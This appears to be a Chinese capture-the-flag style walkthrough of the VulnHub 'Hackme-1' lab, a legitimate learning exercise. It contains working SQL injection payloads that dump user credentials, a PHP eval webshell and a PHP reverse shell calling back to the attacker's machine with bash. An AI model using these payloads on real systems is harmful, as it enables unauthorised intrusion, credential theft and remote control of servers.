Vulnhub靶机——Hackme-1

目录

一、实验环境

1.1 攻击机Kali

1.2 靶机下载

二、站点信息收集

2.1 IP扫描

2.2 端口扫描

2.3 目录扫描

三、漏洞利用

3.1 SQL注入

3.2 文件上传

四、权限提升

4.1 蚁剑连接

4.2 nc反弹连接

一、实验环境

1.1 攻击机Kali

(1)在虚拟机中安装Kali系统并作为攻击机,将网络连接设置成NAT模式

(2)Kali的IP地址为192.168.101.130

1.2 靶机下载

(1)下载地址: hackme: 1 ~ VulnHub

(2)通过上述简介可以知道,此靶机通过Web漏洞获得有限权限访问,并随后通过提权获得root权限。

(3)直接在VMware虚拟机中导入该靶机,将网络连接设置成NAT模式

(4)开启靶机

二、站点信息收集

2.1 IP扫描

使用命令arp-scan -l查找靶机的IP地址,发现靶机地址为192.168.101.139

arp-scan -l

2.2 端口扫描

(1)使用nmap工具对目标机进行端口扫描,发现打开了22端口,80端口

(2)访问80端口http://192.168.101.139,发现有一个登录页面,还可以进行注册

2.3 目录扫描

(1)使用dirsearch工具对网站目录进行扫描

dirsearch -u 192.168.101.139

(2)访问/uploads/目录,猜测应该是一个文件上传的目录

三、漏洞利用

3.1 SQL注入

(1)进入注册页面,注册一个新用户并登录

(2)登录后页面有一个搜索框,可以尝试SQL注入

(3)单击search可以看到很多书名

(4)通过验证可知存在字符型(单引号)SQL注入

OSINT' and 1=1#
OSINT' and 1=2#

(5)判断字段数

OSINT' order by 3#
OSINT' order by 4#

(6)确定回显点

-1' union select 1,2,3#

(7)查看版本号和数据库名

-1' union select version(),database(),3#

(8)查看表名,发现一个user表

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema="webapphacking"#

(9)查看user表的字段信息

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name="users"#

(10)查看用户名和密码,并进行MD5解密

-1' union select group_concat(user),group_concat(pasword),3 from users#

user

pasword

MD5解密

user1

5d41402abc4b2a76b9719d911017c592

hello

User2

6269c4f71a55b24bad0f0267d9be5508

commando

user3

0f359740bd1cda994f8b55330c86d845

p@ssw0rd

test

05a671c66aefea124cc08b76ea6d30bb

testtest

superadmin

2386acb2cf356944177746fc92523983

Uncrackable

test1

05a671c66aefea124cc08b76ea6d30bb

testtest

(11)发现有一个superadmin用户,猜测是管理员用户,登录一下,发现页面可以进行文件上传

3.2 文件上传

(1)新建一个info.php文件,上传该文件

<?php phpinfo();?>

(2)拼接上面目录扫描找到的路径进行访问,发现php文件可以成功上传

四、权限提升

4.1 蚁剑连接

(1)新建一个muma.php,上传一句话木马

<?php @eval($_POST['cmd']);?> //密码是cmd

(2)使用蚁剑进行连接,URL地址填写一句话木马的地址,密码是cmd,连接成功

4.2 nc反弹连接

(1)新建一个nc.php文件,编写nc反弹脚本并上传到网站

<?php

$sock=fsockopen("192.168.101.130",9999);//这里是kali的IP

exec("/bin/bash -i <&3 >&3 2>&3");

?>

(2)kali中开启监听

nc -lvvp 9999

(3)打开蚁剑中的虚拟终端,查看目录发现文件上传成功,执行nc.php文件

(4)kali监听成功

(5)显示系统用户,并筛选使用Bash作为默认shell的用户

cat /etc/passwd | grep /bin/bash

(6)转到/home/hackme目录下查看文件,发现有一个touchmenot文件

(7)执行该文件即可提权成功

./touchmenot

声明

1.本博客文章均为博主日常学习原创内容,转载请注明出处。

2.文章内容如有涉及侵犯您的知识产权和版权问题,请及时与我联系。

3.希望以上的学习经验分享能对您有所帮助。

4.本内容仅供学习和研究使用,严禁用于任何非法或不道德的行为,任何违反法律的行为将由行为人自行承担。

Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.youkuaiyun.com/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.youkuaiyun.com/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.youkuaiyun.com/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值